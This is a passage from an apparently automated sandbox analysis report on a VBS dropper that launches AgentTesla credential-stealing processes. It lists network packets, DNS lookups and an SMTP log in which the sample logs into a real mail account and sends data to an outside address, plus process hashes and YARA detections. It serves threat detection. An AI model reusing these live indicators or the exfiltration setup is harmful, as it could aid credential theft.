                                                        Jan 1, 2022 09:13:01.798892975 CET49803587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:01.937895060 CET58749803162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:01.937932968 CET58749803162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:01.940135002 CET49803587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:01.940505981 CET49803587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:01.940697908 CET49803587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:01.940900087 CET49803587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:02.079382896 CET58749803162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:02.079596996 CET58749803162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:02.079987049 CET58749803162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:02.126877069 CET49803587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:03.982043982 CET49803587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:04.122360945 CET58749803162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:04.122512102 CET49803587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:04.122667074 CET49803587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:04.261471033 CET58749803162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:04.500616074 CET49804587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:04.640346050 CET58749804162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:04.642960072 CET49804587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:04.822457075 CET58749804162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:04.822925091 CET49804587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:04.962836981 CET58749804162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:04.963478088 CET49804587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:05.103945017 CET58749804162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:05.105282068 CET49804587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:05.247020006 CET58749804162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:05.247709036 CET49804587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:05.387444019 CET58749804162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:05.387980938 CET49804587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:05.568588018 CET58749804162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:05.582730055 CET58749804162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:05.583429098 CET49804587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:05.723165035 CET58749804162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:05.723213911 CET58749804162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:05.723994970 CET49804587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:05.724117994 CET49804587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:05.724206924 CET49804587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:05.724314928 CET49804587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:05.724436045 CET49804587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:05.724509954 CET49804587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:05.724565983 CET49804587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:05.724633932 CET49804587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:05.863756895 CET58749804162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:05.863812923 CET58749804162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:05.863934040 CET58749804162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:05.864001989 CET58749804162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:05.864015102 CET58749804162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:05.864027023 CET58749804162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:05.864609957 CET58749804162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:05.908900976 CET49804587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:43.928107023 CET49800587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:44.070090055 CET58749800162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:44.070264101 CET49800587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:44.070429087 CET49800587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:44.210900068 CET58749800162.241.148.206192.168.2.3

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 1, 2022 09:12:03.442965031 CET5213053192.168.2.38.8.8.8
                                                        Jan 1, 2022 09:12:03.590718031 CET53521308.8.8.8192.168.2.3
                                                        Jan 1, 2022 09:12:07.288503885 CET5510253192.168.2.38.8.8.8
                                                        Jan 1, 2022 09:12:07.307257891 CET53551028.8.8.8192.168.2.3
                                                        Jan 1, 2022 09:13:00.458184958 CET5652753192.168.2.38.8.8.8
                                                        Jan 1, 2022 09:13:00.474710941 CET53565278.8.8.8192.168.2.3
                                                        Jan 1, 2022 09:13:04.477238894 CET4955953192.168.2.38.8.8.8
                                                        Jan 1, 2022 09:13:04.496376038 CET53495598.8.8.8192.168.2.3

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Jan 1, 2022 09:12:03.442965031 CET192.168.2.38.8.8.80x64c6Standard query (0)mail.gnvmetalica.peA (IP address)IN (0x0001)
                                                        Jan 1, 2022 09:12:07.288503885 CET192.168.2.38.8.8.80x62daStandard query (0)mail.gnvmetalica.peA (IP address)IN (0x0001)
                                                        Jan 1, 2022 09:13:00.458184958 CET192.168.2.38.8.8.80x2f04Standard query (0)mail.gnvmetalica.peA (IP address)IN (0x0001)
                                                        Jan 1, 2022 09:13:04.477238894 CET192.168.2.38.8.8.80x8aacStandard query (0)mail.gnvmetalica.peA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Jan 1, 2022 09:12:03.590718031 CET8.8.8.8192.168.2.30x64c6No error (0)mail.gnvmetalica.pe162.241.148.206A (IP address)IN (0x0001)
                                                        Jan 1, 2022 09:12:07.307257891 CET8.8.8.8192.168.2.30x62daNo error (0)mail.gnvmetalica.pe162.241.148.206A (IP address)IN (0x0001)
                                                        Jan 1, 2022 09:13:00.474710941 CET8.8.8.8192.168.2.30x2f04No error (0)mail.gnvmetalica.pe162.241.148.206A (IP address)IN (0x0001)
                                                        Jan 1, 2022 09:13:04.496376038 CET8.8.8.8192.168.2.30x8aacNo error (0)mail.gnvmetalica.pe162.241.148.206A (IP address)IN (0x0001)

                                                        SMTP Packets

                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                        Jan 1, 2022 09:12:04.450804949 CET58749799162.241.148.206192.168.2.3220-bh-ht-15.webhostbox.net ESMTP Exim 4.94.2 #2 Sat, 01 Jan 2022 08:12:04 +0000
                                                        220-We do not authorize the use of this system to transport unsolicited,
                                                        220 and/or bulk e-mail.
                                                        Jan 1, 2022 09:12:04.451267004 CET49799587192.168.2.3162.241.148.206EHLO 373836
                                                        Jan 1, 2022 09:12:04.592031002 CET58749799162.241.148.206192.168.2.3250-bh-ht-15.webhostbox.net Hello 373836 [102.129.143.96]
                                                        250-SIZE 52428800
                                                        250-8BITMIME
                                                        250-PIPELINING
                                                        250-PIPE_CONNECT
                                                        250-AUTH PLAIN LOGIN
                                                        250-STARTTLS
                                                        250 HELP
                                                        Jan 1, 2022 09:12:04.595851898 CET49799587192.168.2.3162.241.148.206AUTH login c2FsZUBnbnZtZXRhbGljYS5wZQ==
                                                        Jan 1, 2022 09:12:04.736983061 CET58749799162.241.148.206192.168.2.3334 UGFzc3dvcmQ6
                                                        Jan 1, 2022 09:12:04.945499897 CET58749799162.241.148.206192.168.2.3235 Authentication succeeded
                                                        Jan 1, 2022 09:12:04.946636915 CET49799587192.168.2.3162.241.148.206MAIL FROM:<sale@gnvmetalica.pe>
                                                        Jan 1, 2022 09:12:05.087377071 CET58749799162.241.148.206192.168.2.3250 OK
                                                        Jan 1, 2022 09:12:05.087737083 CET49799587192.168.2.3162.241.148.206RCPT TO:<edum3du@yandex.ru>
                                                        Jan 1, 2022 09:12:05.278330088 CET58749799162.241.148.206192.168.2.3250 Accepted
                                                        Jan 1, 2022 09:12:05.278609991 CET49799587192.168.2.3162.241.148.206DATA
                                                        Jan 1, 2022 09:12:05.419703960 CET58749799162.241.148.206192.168.2.3354 Enter message, ending with "." on a line by itself
                                                        Jan 1, 2022 09:12:05.422091961 CET49799587192.168.2.3162.241.148.206.
                                                        Jan 1, 2022 09:12:05.562927961 CET58749799162.241.148.206192.168.2.3250 OK id=1n3ZUj-003F49-BD
                                                        Jan 1, 2022 09:12:07.110874891 CET49799587192.168.2.3162.241.148.206QUIT
                                                        Jan 1, 2022 09:12:07.252335072 CET58749799162.241.148.206192.168.2.3221 bh-ht-15.webhostbox.net closing connection
                                                        Jan 1, 2022 09:12:07.643258095 CET58749800162.241.148.206192.168.2.3220-bh-ht-15.webhostbox.net ESMTP Exim 4.94.2 #2 Sat, 01 Jan 2022 08:12:07 +0000
                                                        220-We do not authorize the use of this system to transport unsolicited,
                                                        220 and/or bulk e-mail.
                                                        Jan 1, 2022 09:12:07.643572092 CET49800587192.168.2.3162.241.148.206EHLO 373836
                                                        Jan 1, 2022 09:12:07.784706116 CET58749800162.241.148.206192.168.2.3250-bh-ht-15.webhostbox.net Hello 373836 [102.129.143.96]
                                                        250-SIZE 52428800
                                                        250-8BITMIME
                                                        250-PIPELINING
                                                        250-PIPE_CONNECT
                                                        250-AUTH PLAIN LOGIN
                                                        250-STARTTLS
                                                        250 HELP
                                                        Jan 1, 2022 09:12:07.785276890 CET49800587192.168.2.3162.241.148.206AUTH login c2FsZUBnbnZtZXRhbGljYS5wZQ==
                                                        Jan 1, 2022 09:12:07.927659988 CET58749800162.241.148.206192.168.2.3334 UGFzc3dvcmQ6
                                                        Jan 1, 2022 09:12:08.073498011 CET58749800162.241.148.206192.168.2.3235 Authentication succeeded
                                                        Jan 1, 2022 09:12:08.073766947 CET49800587192.168.2.3162.241.148.206MAIL FROM:<sale@gnvmetalica.pe>
                                                        Jan 1, 2022 09:12:08.214665890 CET58749800162.241.148.206192.168.2.3250 OK
                                                        Jan 1, 2022 09:12:08.214996099 CET49800587192.168.2.3162.241.148.206RCPT TO:<edum3du@yandex.ru>
                                                        Jan 1, 2022 09:12:08.396507978 CET58749800162.241.148.206192.168.2.3250 Accepted
                                                        Jan 1, 2022 09:12:08.396923065 CET49800587192.168.2.3162.241.148.206DATA
                                                        Jan 1, 2022 09:12:08.537833929 CET58749800162.241.148.206192.168.2.3354 Enter message, ending with "." on a line by itself
                                                        Jan 1, 2022 09:12:08.541980982 CET49800587192.168.2.3162.241.148.206.
                                                        Jan 1, 2022 09:12:08.689251900 CET58749800162.241.148.206192.168.2.3250 OK id=1n3ZUm-003FBN-F0
                                                        Jan 1, 2022 09:13:00.958172083 CET58749803162.241.148.206192.168.2.3220-bh-ht-15.webhostbox.net ESMTP Exim 4.94.2 #2 Sat, 01 Jan 2022 08:13:00 +0000
                                                        220-We do not authorize the use of this system to transport unsolicited,
                                                        220 and/or bulk e-mail.
                                                        Jan 1, 2022 09:13:00.958606958 CET49803587192.168.2.3162.241.148.206EHLO 373836
                                                        Jan 1, 2022 09:13:01.124368906 CET58749803162.241.148.206192.168.2.3250-bh-ht-15.webhostbox.net Hello 373836 [102.129.143.96]
                                                        250-SIZE 52428800
                                                        250-8BITMIME
                                                        250-PIPELINING
                                                        250-PIPE_CONNECT
                                                        250-AUTH PLAIN LOGIN
                                                        250-STARTTLS
                                                        250 HELP
                                                        Jan 1, 2022 09:13:01.124885082 CET49803587192.168.2.3162.241.148.206AUTH login c2FsZUBnbnZtZXRhbGljYS5wZQ==
                                                        Jan 1, 2022 09:13:01.264482021 CET58749803162.241.148.206192.168.2.3334 UGFzc3dvcmQ6
                                                        Jan 1, 2022 09:13:01.472667933 CET58749803162.241.148.206192.168.2.3235 Authentication succeeded
                                                        Jan 1, 2022 09:13:01.473191023 CET49803587192.168.2.3162.241.148.206MAIL FROM:<sale@gnvmetalica.pe>
                                                        Jan 1, 2022 09:13:01.612147093 CET58749803162.241.148.206192.168.2.3250 OK
                                                        Jan 1, 2022 09:13:01.612683058 CET49803587192.168.2.3162.241.148.206RCPT TO:<edum3du@yandex.ru>
                                                        Jan 1, 2022 09:13:01.796439886 CET58749803162.241.148.206192.168.2.3250 Accepted
                                                        Jan 1, 2022 09:13:01.798892975 CET49803587192.168.2.3162.241.148.206DATA
                                                        Jan 1, 2022 09:13:01.937932968 CET58749803162.241.148.206192.168.2.3354 Enter message, ending with "." on a line by itself
                                                        Jan 1, 2022 09:13:01.940900087 CET49803587192.168.2.3162.241.148.206.
                                                        Jan 1, 2022 09:13:02.079987049 CET58749803162.241.148.206192.168.2.3250 OK id=1n3ZVd-003Goy-Ry
                                                        Jan 1, 2022 09:13:03.982043982 CET49803587192.168.2.3162.241.148.206QUIT
                                                        Jan 1, 2022 09:13:04.122360945 CET58749803162.241.148.206192.168.2.3221 bh-ht-15.webhostbox.net closing connection
                                                        Jan 1, 2022 09:13:04.822457075 CET58749804162.241.148.206192.168.2.3220-bh-ht-15.webhostbox.net ESMTP Exim 4.94.2 #2 Sat, 01 Jan 2022 08:13:04 +0000
                                                        220-We do not authorize the use of this system to transport unsolicited,
                                                        220 and/or bulk e-mail.
                                                        Jan 1, 2022 09:13:04.822925091 CET49804587192.168.2.3162.241.148.206EHLO 373836
                                                        Jan 1, 2022 09:13:04.962836981 CET58749804162.241.148.206192.168.2.3250-bh-ht-15.webhostbox.net Hello 373836 [102.129.143.96]
                                                        250-SIZE 52428800
                                                        250-8BITMIME
                                                        250-PIPELINING
                                                        250-PIPE_CONNECT
                                                        250-AUTH PLAIN LOGIN
                                                        250-STARTTLS
                                                        250 HELP
                                                        Jan 1, 2022 09:13:04.963478088 CET49804587192.168.2.3162.241.148.206AUTH login c2FsZUBnbnZtZXRhbGljYS5wZQ==
                                                        Jan 1, 2022 09:13:05.103945017 CET58749804162.241.148.206192.168.2.3334 UGFzc3dvcmQ6
                                                        Jan 1, 2022 09:13:05.247020006 CET58749804162.241.148.206192.168.2.3235 Authentication succeeded
                                                        Jan 1, 2022 09:13:05.247709036 CET49804587192.168.2.3162.241.148.206MAIL FROM:<sale@gnvmetalica.pe>
                                                        Jan 1, 2022 09:13:05.387444019 CET58749804162.241.148.206192.168.2.3250 OK
                                                        Jan 1, 2022 09:13:05.387980938 CET49804587192.168.2.3162.241.148.206RCPT TO:<edum3du@yandex.ru>
                                                        Jan 1, 2022 09:13:05.582730055 CET58749804162.241.148.206192.168.2.3250 Accepted
                                                        Jan 1, 2022 09:13:05.583429098 CET49804587192.168.2.3162.241.148.206DATA
                                                        Jan 1, 2022 09:13:05.723213911 CET58749804162.241.148.206192.168.2.3354 Enter message, ending with "." on a line by itself
                                                        Jan 1, 2022 09:13:05.724633932 CET49804587192.168.2.3162.241.148.206.
                                                        Jan 1, 2022 09:13:05.864609957 CET58749804162.241.148.206192.168.2.3250 OK id=1n3ZVh-003GxB-L1
                                                        Jan 1, 2022 09:13:43.928107023 CET49800587192.168.2.3162.241.148.206QUIT
                                                        Jan 1, 2022 09:13:44.070090055 CET58749800162.241.148.206192.168.2.3221 bh-ht-15.webhostbox.net closing connection

                                                        Code Manipulations

                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        Analysis Process: wscript.exe PID: 3672 Parent PID: 3352

                                                        General

                                                        Start time:09:10:06
                                                        Start date:01/01/2022
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\TGFTR.vbs"
                                                        Imagebase:0x7ff7fffa0000
                                                        File size:163840 bytes
                                                        MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: anyname.exe PID: 6000 Parent PID: 3672

                                                        General

                                                        Start time:09:10:08
                                                        Start date:01/01/2022
                                                        Path:C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\anyname.exe"
                                                        Imagebase:0x10000
                                                        File size:717312 bytes
                                                        MD5 hash:9AC2AB7CA14ACC134AEFDF731DED674B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.339301678.0000000003449000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.339301678.0000000003449000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.338630738.0000000002441000.00000004.00000001.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 32%, ReversingLabs
                                                        Reputation:low

                                                        Chronological Activities

                                                        Analysis Process: anyname.exe PID: 6260 Parent PID: 6000

                                                        General

                                                        Start time:09:10:17
                                                        Start date:01/01/2022
                                                        Path:C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        Imagebase:0x1a0000
                                                        File size:717312 bytes
                                                        MD5 hash:9AC2AB7CA14ACC134AEFDF731DED674B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low

                                                        Chronological Activities

                                                        Analysis Process: anyname.exe PID: 5940 Parent PID: 6000

                                                        General

                                                        Start time:09:10:19
                                                        Start date:01/01/2022
                                                        Path:C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        Imagebase:0x150000
                                                        File size:717312 bytes
                                                        MD5 hash:9AC2AB7CA14ACC134AEFDF731DED674B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low

                                                        Chronological Activities

                                                        Analysis Process: anyname.exe PID: 6116 Parent PID: 6000

                                                        General

                                                        Start time:09:10:20
                                                        Start date:01/01/2022
                                                        Path:C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        Imagebase:0x190000
                                                        File size:717312 bytes
                                                        MD5 hash:9AC2AB7CA14ACC134AEFDF731DED674B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low

                                                        Chronological Activities

                                                        Analysis Process: anyname.exe PID: 5608 Parent PID: 6000

                                                        General

                                                        Start time:09:10:22
                                                        Start date:01/01/2022
                                                        Path:C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        Imagebase:0xa00000
                                                        File size:717312 bytes
                                                        MD5 hash:9AC2AB7CA14ACC134AEFDF731DED674B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.818827980.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000002.818827980.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.334391664.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.334391664.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.333862225.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.333862225.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.335234290.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.335234290.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.333358376.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.333358376.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.823366416.0000000002DD1000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.823366416.0000000002DD1000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        Chronological Activities

                                                        Analysis Process: jNnIJrO.exe PID: 5952 Parent PID: 3352

                                                        General

                                                        Start time:09:10:54
                                                        Start date:01/01/2022
                                                        Path:C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe"
                                                        Imagebase:0x750000
                                                        File size:717312 bytes
                                                        MD5 hash:9AC2AB7CA14ACC134AEFDF731DED674B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000A.00000002.420006231.0000000002C61000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.421939439.0000000003C69000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000A.00000002.421939439.0000000003C69000.00000004.00000001.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 32%, ReversingLabs
                                                        Reputation:low

                                                        Chronological Activities

                                                        Analysis Process: jNnIJrO.exe PID: 2276 Parent PID: 5952

                                                        General

                                                        Start time:09:10:59
                                                        Start date:01/01/2022
                                                        Path:C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                                                        Imagebase:0xc10000
                                                        File size:717312 bytes
                                                        MD5 hash:9AC2AB7CA14ACC134AEFDF731DED674B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.414176975.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.414176975.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.437781088.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000002.437781088.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.413072340.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.413072340.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.412466130.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.412466130.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.415518300.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.415518300.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.439216232.0000000002FE1000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.439216232.0000000002FE1000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        Chronological Activities

                                                        Analysis Process: jNnIJrO.exe PID: 5280 Parent PID: 3352

                                                        General

                                                        Start time:09:11:03
                                                        Start date:01/01/2022
                                                        Path:C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe"
                                                        Imagebase:0x4b0000
                                                        File size:717312 bytes
                                                        MD5 hash:9AC2AB7CA14ACC134AEFDF731DED674B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000010.00000002.435288395.0000000002811000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.437858484.0000000003819000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000010.00000002.437858484.0000000003819000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        Chronological Activities

                                                        Analysis Process: jNnIJrO.exe PID: 6456 Parent PID: 5280

                                                        General

                                                        Start time:09:11:08
                                                        Start date:01/01/2022
                                                        Path:C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                                                        Imagebase:0xba0000
                                                        File size:717312 bytes
                                                        MD5 hash:9AC2AB7CA14ACC134AEFDF731DED674B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000000.432184199.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000012.00000000.432184199.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000000.430664818.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000012.00000000.430664818.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000000.431529327.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000012.00000000.431529327.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.818828907.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
